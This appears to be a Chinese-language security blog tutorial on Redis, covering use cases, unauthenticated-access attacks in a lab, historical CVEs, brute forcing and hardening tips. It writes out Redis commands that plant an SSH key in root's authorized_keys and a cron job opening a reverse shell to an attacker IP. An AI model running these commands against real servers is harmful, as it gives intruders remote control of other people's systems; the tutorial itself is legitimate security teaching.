<!DOCTYPE html><html><head><meta name="generator" content="Hexo 3.8.0"><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="Redis安全问题"><meta name="keywords" content="Redis,未授权访问"><meta name="author" content="Sys71m"><meta name="copyright" content="Sys71m"><title>Redis安全问题 | sys71m</title><link rel="shortcut icon" href="/lufei.ico"><link rel="stylesheet" href="/css/index.css?version=1.7.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.7.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  }
} </script><link rel="alternate" href="/atom.xml" title="sys71m" type="application/atom+xml">
</head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Redis理解及使用场景"><span class="toc-number">1.</span> <span class="toc-text">Redis理解及使用场景</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#缓存"><span class="toc-number">1.1.</span> <span class="toc-text">缓存</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#排行榜"><span class="toc-number">1.2.</span> <span class="toc-text">排行榜</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#计数器"><span class="toc-number">1.3.</span> <span class="toc-text">计数器</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#分布式会话"><span class="toc-number">1.4.</span> <span class="toc-text">分布式会话</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#分布式锁"><span class="toc-number">1.5.</span> <span class="toc-text">分布式锁</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#社交网络"><span class="toc-number">1.6.</span> <span class="toc-text">社交网络</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#最新列表"><span class="toc-number">1.7.</span> <span class="toc-text">最新列表</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#消息系统"><span class="toc-number">1.8.</span> <span class="toc-text">消息系统</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Redis常见攻击方式"><span class="toc-number">2.</span> <span class="toc-text">Redis常见攻击方式</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#未授权访问"><span class="toc-number">2.1.</span> <span class="toc-text">未授权访问</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#敏感信息泄露"><span class="toc-number">2.1.1.</span> <span class="toc-text">敏感信息泄露</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#写入SSH公钥登录服务器"><span class="toc-number">2.1.2.</span> <span class="toc-text">写入SSH公钥登录服务器</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#web目录写入webshell"><span class="toc-number">2.1.3.</span> <span class="toc-text">web目录写入webshell</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#定时任务反弹shell"><span class="toc-number">2.1.4.</span> <span class="toc-text">定时任务反弹shell</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#其他"><span class="toc-number">2.1.5.</span> <span class="toc-text">其他</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#主从复制RCE"><span class="toc-number">2.2.</span> <span class="toc-text">主从复制RCE</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#历史CVE"><span class="toc-number">2.3.</span> <span class="toc-text">历史CVE</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#CVE-2016-8339"><span class="toc-number">2.3.1.</span> <span class="toc-text">CVE-2016-8339</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#CVE-2015-8080"><span class="toc-number">2.3.2.</span> <span class="toc-text">CVE-2015-8080</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#CVE-2015-4335"><span class="toc-number">2.3.3.</span> <span class="toc-text">CVE-2015-4335</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#CVE-2013-7458"><span class="toc-number">2.3.4.</span> <span class="toc-text">CVE-2013-7458</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#暴力破解"><span class="toc-number">2.4.</span> <span class="toc-text">暴力破解</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Redis常见命令"><span class="toc-number">3.</span> <span class="toc-text">Redis常见命令</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#环境搭建"><span class="toc-number">4.</span> <span class="toc-text">环境搭建</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#端口探测"><span class="toc-number">5.</span> <span class="toc-text">端口探测</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#未授权访问-1"><span class="toc-number">6.</span> <span class="toc-text">未授权访问</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#敏感信息泄露-1"><span class="toc-number">6.1.</span> <span class="toc-text">敏感信息泄露</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web目录写入webshell-1"><span class="toc-number">6.2.</span> <span class="toc-text">web目录写入webshell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#写入SSH公钥"><span class="toc-number">6.3.</span> <span class="toc-text">写入SSH公钥</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#定时任务反弹shell-1"><span class="toc-number">6.4.</span> <span class="toc-text">定时任务反弹shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#其他-1"><span class="toc-number">6.5.</span> <span class="toc-text">其他</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#主从复制REC"><span class="toc-number">7.</span> <span class="toc-text">主从复制REC</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#使用范围"><span class="toc-number">7.1.</span> <span class="toc-text">使用范围</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#概述"><span class="toc-number">7.2.</span> <span class="toc-text">概述</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#POC"><span class="toc-number">7.3.</span> <span class="toc-text">POC</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#利用"><span class="toc-number">7.4.</span> <span class="toc-text">利用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#历史CVE-1"><span class="toc-number">8.</span> <span class="toc-text">历史CVE</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Redis远程代码执行漏洞（CVE-2016-8339）"><span class="toc-number">8.1.</span> <span class="toc-text">Redis远程代码执行漏洞（CVE-2016-8339）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2015-8080-1"><span class="toc-number">8.2.</span> <span class="toc-text">CVE-2015-8080</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2015-4335-1"><span class="toc-number">8.3.</span> <span class="toc-text">CVE-2015-4335</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2013-7458-1"><span class="toc-number">8.4.</span> <span class="toc-text">CVE-2013-7458</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#暴力破解-1"><span class="toc-number">9.</span> <span class="toc-text">暴力破解</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#安全配置"><span class="toc-number">10.</span> <span class="toc-text">安全配置</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#参考"><span class="toc-number">11.</span> <span class="toc-text">参考</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://raw.githubusercontent.com/ttonys/gitPic/master/lufei.jpg"></div><div class="author-info__name text-center">Sys71m</div><div class="author-info__description text-center"></div><div class="follow-button"><a href="https://github.com/ttonys">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">31</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">45</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">Categories</span><span class="pull-right">18</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://raw.githubusercontent.com/ttonys/MarkDownPic/master/test33.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">sys71m</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">Redis安全问题</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-03-15</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/Redis/">Redis</a><div class="post-meta-wordcount"><span>Word count: </span><span class="word-count">2.1k</span><span class="post-meta__separator">|</span><span>Reading time: 6 min</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>Redis服务的默认端口是6379，是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。</p>
<a id="more"></a>  
<h2 id="Redis理解及使用场景"><a href="#Redis理解及使用场景" class="headerlink" title="Redis理解及使用场景"></a>Redis理解及使用场景</h2><p>Redis（Remote Dictionary Server )，即远程字典服务，是一个开源的使用ANSI <a href="https://baike.baidu.com/item/C语言" target="_blank" rel="noopener">C语言</a>编写、支持网络、可基于内存亦可持久化的日志型、Key-Value<a href="https://baike.baidu.com/item/数据库/103728" target="_blank" rel="noopener">数据库</a>，并提供多种语言的API。和MYSQL等常见的数据库都有着共同的存储数据的作用，但Redis的主要适用于如下场景：</p>
<h3 id="缓存"><a href="#缓存" class="headerlink" title="缓存"></a>缓存</h3><p>缓存现在几乎是所有中大型网站都在用的必杀技，合理的利用缓存不仅能够提升网站访问速度，还能大大降低数据库的压力。Redis提供了键过期功能，也提供了灵活的键淘汰策略，所以，现在Redis用在缓存的场合非常多。</p>
<h3 id="排行榜"><a href="#排行榜" class="headerlink" title="排行榜"></a>排行榜</h3><p>很多网站都有排行榜应用的，如京东的月度销量榜单、商品按时间的上新排行榜等。Redis提供的有序集合数据类构能实现各种复杂的排行榜应用。</p>
<h3 id="计数器"><a href="#计数器" class="headerlink" title="计数器"></a>计数器</h3><p>什么是计数器，如电商网站商品的浏览量、视频网站视频的播放数等。为了保证数据实时效，每次浏览都得给+1，并发量高时如果每次都请求数据库操作无疑是种挑战和压力。Redis提供的incr命令来实现计数器功能，内存操作，性能非常好，非常适用于这些计数场景。</p>
<h3 id="分布式会话"><a href="#分布式会话" class="headerlink" title="分布式会话"></a>分布式会话</h3><p>集群模式下，在应用不多的情况下一般使用容器自带的session复制功能就能满足，当应用增多相对复杂的系统中，一般都会搭建以Redis等内存数据库为中心的session服务，session不再由容器管理，而是由session服务及内存数据库管理。</p>
<h3 id="分布式锁"><a href="#分布式锁" class="headerlink" title="分布式锁"></a>分布式锁</h3><p>在很多互联网公司中都使用了分布式技术，分布式技术带来的技术挑战是对同一个资源的并发访问，如全局ID、减库存、秒杀等场景，并发量不大的场景可以使用数据库的悲观锁、乐观锁来实现，但在并发量高的场合中，利用数据库锁来控制资源的并发访问是不太理想的，大大影响了数据库的性能。可以利用Redis的setnx功能来编写分布式的锁，如果设置返回1说明获取锁成功，否则获取锁失败，实际应用中要考虑的细节要更多。</p>
<h3 id="社交网络"><a href="#社交网络" class="headerlink" title="社交网络"></a>社交网络</h3><p>点赞、踩、关注/被关注、共同好友等是社交网站的基本功能，社交网站的访问量通常来说比较大，而且传统的关系数据库类型不适合存储这种类型的数据，Redis提供的哈希、集合等数据结构能很方便的的实现这些功能。</p>
<h3 id="最新列表"><a href="#最新列表" class="headerlink" title="最新列表"></a>最新列表</h3><p>Redis列表结构，LPUSH可以在列表头部插入一个内容ID作为关键字，LTRIM可用来限制列表的数量，这样列表永远为N个ID，无需查询最新的列表，直接根据ID去到对应的内容页即可。</p>
<h3 id="消息系统"><a href="#消息系统" class="headerlink" title="消息系统"></a>消息系统</h3><p>消息队列是大型网站必用中间件，如ActiveMQ、RabbitMQ、Kafka等流行的消息队列中间件，主要用于业务解耦、流量削峰及异步处理实时性低的业务。Redis提供了发布/订阅及阻塞队列功能，能实现一个简单的消息队列系统。另外，这个不能和专业的消息中间件相比。</p>
<h2 id="Redis常见攻击方式"><a href="#Redis常见攻击方式" class="headerlink" title="Redis常见攻击方式"></a>Redis常见攻击方式</h2><p>先总结一下，后文会实际演示。</p>
<h3 id="未授权访问"><a href="#未授权访问" class="headerlink" title="未授权访问"></a>未授权访问</h3><h4 id="敏感信息泄露"><a href="#敏感信息泄露" class="headerlink" title="敏感信息泄露"></a>敏感信息泄露</h4><h4 id="写入SSH公钥登录服务器"><a href="#写入SSH公钥登录服务器" class="headerlink" title="写入SSH公钥登录服务器"></a>写入SSH公钥登录服务器</h4><h4 id="web目录写入webshell"><a href="#web目录写入webshell" class="headerlink" title="web目录写入webshell"></a>web目录写入webshell</h4><h4 id="定时任务反弹shell"><a href="#定时任务反弹shell" class="headerlink" title="定时任务反弹shell"></a>定时任务反弹shell</h4><h4 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h4><h3 id="主从复制RCE"><a href="#主从复制RCE" class="headerlink" title="主从复制RCE"></a>主从复制RCE</h3><h3 id="历史CVE"><a href="#历史CVE" class="headerlink" title="历史CVE"></a>历史CVE</h3><h4 id="CVE-2016-8339"><a href="#CVE-2016-8339" class="headerlink" title="CVE-2016-8339"></a>CVE-2016-8339</h4><h4 id="CVE-2015-8080"><a href="#CVE-2015-8080" class="headerlink" title="CVE-2015-8080"></a>CVE-2015-8080</h4><h4 id="CVE-2015-4335"><a href="#CVE-2015-4335" class="headerlink" title="CVE-2015-4335"></a>CVE-2015-4335</h4><h4 id="CVE-2013-7458"><a href="#CVE-2013-7458" class="headerlink" title="CVE-2013-7458"></a>CVE-2013-7458</h4><h3 id="暴力破解"><a href="#暴力破解" class="headerlink" title="暴力破解"></a>暴力破解</h3><h2 id="Redis常见命令"><a href="#Redis常见命令" class="headerlink" title="Redis常见命令"></a>Redis常见命令</h2><p>查看信息：info</p>
<p>删除所有数据库内容：flushall</p>
<p>刷新数据库：flushdb</p>
<p>查看所有键：keys *，使用select num可以查看键值数据</p>
<p>设置变量：set tmp_val “sys71m”</p>
<p>查看变量值：get tmp_val</p>
<p>查看备份文件路径：config get dir</p>
<p>设置备份文件路径：config set dir dirpath</p>
<p>查看备份文件名：config get dbfilename</p>
<p>设置备份文件名：config set dbfilename filename</p>
<p>保存备份文件：save</p>
<h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><p>版本：Redis4.0.14</p>
<p>下载地址：<a href="http://download.redis.io/releases/" target="_blank" rel="noopener">http://download.redis.io/releases/</a></p>
<p>安装：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">tar xzf redis-4.0.14.tar.gz</span><br><span class="line">cd redis-4.0.14/</span><br><span class="line">make</span><br></pre></td></tr></table></figure>
<p>配置：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">vim redis.conf</span><br><span class="line">//修改69行，默认只能本地访问，修改如下：</span><br><span class="line">bind 0.0.0.0</span><br></pre></td></tr></table></figure>
<p>启动：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./src/redis-server redis.conf</span><br></pre></td></tr></table></figure>
<h2 id="端口探测"><a href="#端口探测" class="headerlink" title="端口探测"></a>端口探测</h2><p><img src="https://raw.githubusercontent.com/ttonys/MarkDownPic/master/Redis/image-20200315154908711.png" alt="image-20200315154908711"></p>
<h2 id="未授权访问-1"><a href="#未授权访问-1" class="headerlink" title="未授权访问"></a>未授权访问</h2><h3 id="敏感信息泄露-1"><a href="#敏感信息泄露-1" class="headerlink" title="敏感信息泄露"></a>敏感信息泄露</h3><p><img src="https://raw.githubusercontent.com/ttonys/MarkDownPic/master/Redis/image-20200315141045861.png" alt="image-20200315141045861"></p>
<h3 id="web目录写入webshell-1"><a href="#web目录写入webshell-1" class="headerlink" title="web目录写入webshell"></a>web目录写入webshell</h3><p>注意：已知网站的绝对路径，该目录下具有读写权限</p>
<p><img src="https://raw.githubusercontent.com/ttonys/MarkDownPic/master/Redis/image-20200315141617512.png" alt="image-20200315141617512"></p>
<p>访问写入的shell：</p>
<p><img src="https://raw.githubusercontent.com/ttonys/MarkDownPic/master/Redis/image-20200315141739554.png" alt="image-20200315141739554"></p>
<h3 id="写入SSH公钥"><a href="#写入SSH公钥" class="headerlink" title="写入SSH公钥"></a>写入SSH公钥</h3><p>这里攻击环境切换为kali，windows太麻烦。。。</p>
<p>生成ras公钥：</p>
<p><img src="https://raw.githubusercontent.com/ttonys/MarkDownPic/master/Redis/image-20200315154623167.png" alt="image-20200315154623167"></p>
<p>此时在<code>/root/.ssh/</code>目录下会生成两个文件<code>is_rsa</code>和<code>is_rsa.pub</code>。</p>
<p>将公钥写入目标的<code>root/.ssh/</code>目录下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">#设置备份路径</span><br><span class="line">config set dir /root/.ssh/</span><br><span class="line">config set dbfilename authorized_keys</span><br><span class="line"># 保存key的时候加上两个\n是为了避免和Redis里其他缓存数据混合</span><br><span class="line">set key &quot;********&quot;</span><br><span class="line">save</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/ttonys/MarkDownPic/master/Redis/image-20200315160254669.png" alt="image-20200315160254669"></p>
<p>ssh连接：</p>
<p><img src="https://raw.githubusercontent.com/ttonys/MarkDownPic/master/Redis/image-20200315160438191.png" alt="image-20200315160438191"></p>
<h3 id="定时任务反弹shell-1"><a href="#定时任务反弹shell-1" class="headerlink" title="定时任务反弹shell"></a>定时任务反弹shell</h3><p>该方法只能CentOS上使用，Ubuntu、Debian上行不通。原因如下：</p>
<ul>
<li>权限问题，Ubuntu定时任务需要root权限；</li>
<li>Redis备份文件存在乱码，而Debian和Ubuntu对定时任务的格式校验很严格，因此在Debian和Ubuntu上会报错，而在CentOS上不会报错；</li>
</ul>
<p>大致原理与上面相似，kali是在debian的基础上改的。。云实验。。。如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">config set dir /var/spool/cron/crontabs/</span><br><span class="line">config set dbfilename root</span><br><span class="line">set payload &quot;\n\n* * * * * bash -i &gt;&amp; /dev/tcp/192.168.227.133/666 0&gt;&amp;1\n\n&quot;</span><br><span class="line">save</span><br></pre></td></tr></table></figure>
<h3 id="其他-1"><a href="#其他-1" class="headerlink" title="其他"></a>其他</h3><p>写入<code>/etc/passwd</code>文件实现任意账号密码重置</p>
<p>写入Windows启动项</p>
<h2 id="主从复制REC"><a href="#主从复制REC" class="headerlink" title="主从复制REC"></a>主从复制REC</h2><h3 id="使用范围"><a href="#使用范围" class="headerlink" title="使用范围"></a>使用范围</h3><p>Redis未授权访问在4.x/5.0.5以前版本下</p>
<h3 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h3><p>Redis是一个使用ANSI C编写的开源、支持网络、基于内存、可选持久性的键值对存储数据库。但如果当把数据存储在单个Redis的实例中，当读写体量比较大的时候，服务端就很难承受。为了应对这种情况，Redis就提供了主从模式，主从模式就是指使用一个redis实例作为主机，其他实例都作为备份机，其中主机和从机数据相同，而从机只负责读，主机只负责写，通过读写分离可以大幅度减轻流量的压力，算是一种通过牺牲空间来换取效率的缓解方式。</p>
<h3 id="POC"><a href="#POC" class="headerlink" title="POC"></a>POC</h3><p>下载地址：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://github.com/vulhub/redis-rogue-getshell</span><br></pre></td></tr></table></figure>
<h3 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h3><p><img src="https://raw.githubusercontent.com/ttonys/MarkDownPic/master/Redis/image-20200315162822651.png" alt></p>
<h2 id="历史CVE-1"><a href="#历史CVE-1" class="headerlink" title="历史CVE"></a>历史CVE</h2><h3 id="Redis远程代码执行漏洞（CVE-2016-8339）"><a href="#Redis远程代码执行漏洞（CVE-2016-8339）" class="headerlink" title="Redis远程代码执行漏洞（CVE-2016-8339）"></a>Redis远程代码执行漏洞（CVE-2016-8339）</h3><p>Redis 3.2.x &lt; 3.2.4 版本存在缓冲区溢出漏洞，可导致任意代码执行。Redis数据结构存储的CONFIG SET命令中client-output-buffer-limit选项处理存在越界写漏洞。构造的CONFIG SET命令可导致越界写，从而RCE。</p>
<h3 id="CVE-2015-8080-1"><a href="#CVE-2015-8080-1" class="headerlink" title="CVE-2015-8080"></a>CVE-2015-8080</h3><p>Redis版本 2.8.x &lt; 2.8.24 和 3.0.x &lt; 3.0.6 中，lua_struct.c中的getnum函数存在整数溢出漏洞，导致攻击者可以运行Lua代码或可能绕过沙盒限制。</p>
<h3 id="CVE-2015-4335-1"><a href="#CVE-2015-4335-1" class="headerlink" title="CVE-2015-4335"></a>CVE-2015-4335</h3><p>Redis 2.8.1 之前版本和 3.0.2 之前版本中存在安全漏洞，攻击者可以远程执行eval命令，利用该漏洞执行任意Lua字节码。</p>
<h3 id="CVE-2013-7458-1"><a href="#CVE-2013-7458-1" class="headerlink" title="CVE-2013-7458"></a>CVE-2013-7458</h3><p>读取”.rediscli_history”配置文件信息。</p>
<h2 id="暴力破解-1"><a href="#暴力破解-1" class="headerlink" title="暴力破解"></a>暴力破解</h2><p>首先设置一个临时的密码：</p>
<p><img src="https://raw.githubusercontent.com/ttonys/MarkDownPic/master/Redis/image-20200315163458809.png" alt="image-20200315163458809"></p>
<p>使用hydra暴力破解：</p>
<p><img src="https://raw.githubusercontent.com/ttonys/MarkDownPic/master/Redis/image-20200315163854694.png" alt="image-20200315163854694"></p>
<h2 id="安全配置"><a href="#安全配置" class="headerlink" title="安全配置"></a>安全配置</h2><ul>
<li>Redis服务端口禁止在公网开发</li>
<li>配置Redis的访问密码，复杂度要高。。</li>
<li>以低权限运行Redis服务，禁止用root等最高权限运行；</li>
<li>确保authorized_keys文件的安全，尽量阻止其他用户添加新的公钥；</li>
</ul>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">https://segmentfault.com/a/1190000016188385</span><br><span class="line">https://damit5.com/2018/05/18/Redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/</span><br></pre></td></tr></table></figure>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">Sys71m</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="https://www.sys71m.top/2020/03/15/Redis安全问题/">https://www.sys71m.top/2020/03/15/Redis安全问题/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/Redis/">Redis</a><a class="post-meta__tags" href="/tags/未授权访问/">未授权访问</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/03/29/基于Scrapy的漏洞监控平台/"><i class="fa fa-chevron-left">  </i><span>基于Scrapy的漏洞监控平台</span></a></div><div class="next-post pull-right"><a href="/2020/02/22/Apache Tomcat漏洞分析及复现(CVE-2020-1938)/"><span>Apache Tomcat漏洞分析及复现(CVE-2020-1938)</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://raw.githubusercontent.com/ttonys/MarkDownPic/master/test33.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2017 - 2020 By Sys71m</div><div class="framework-info"><span>Driven - </span><a href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.7.0"></script><script src="/js/fancybox.js?version=1.7.0"></script><script src="/js/sidebar.js?version=1.7.0"></script><script src="/js/copy.js?version=1.7.0"></script><script src="/js/fireworks.js?version=1.7.0"></script><script src="/js/transition.js?version=1.7.0"></script><script src="/js/scroll.js?version=1.7.0"></script><script src="/js/head.js?version=1.7.0"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>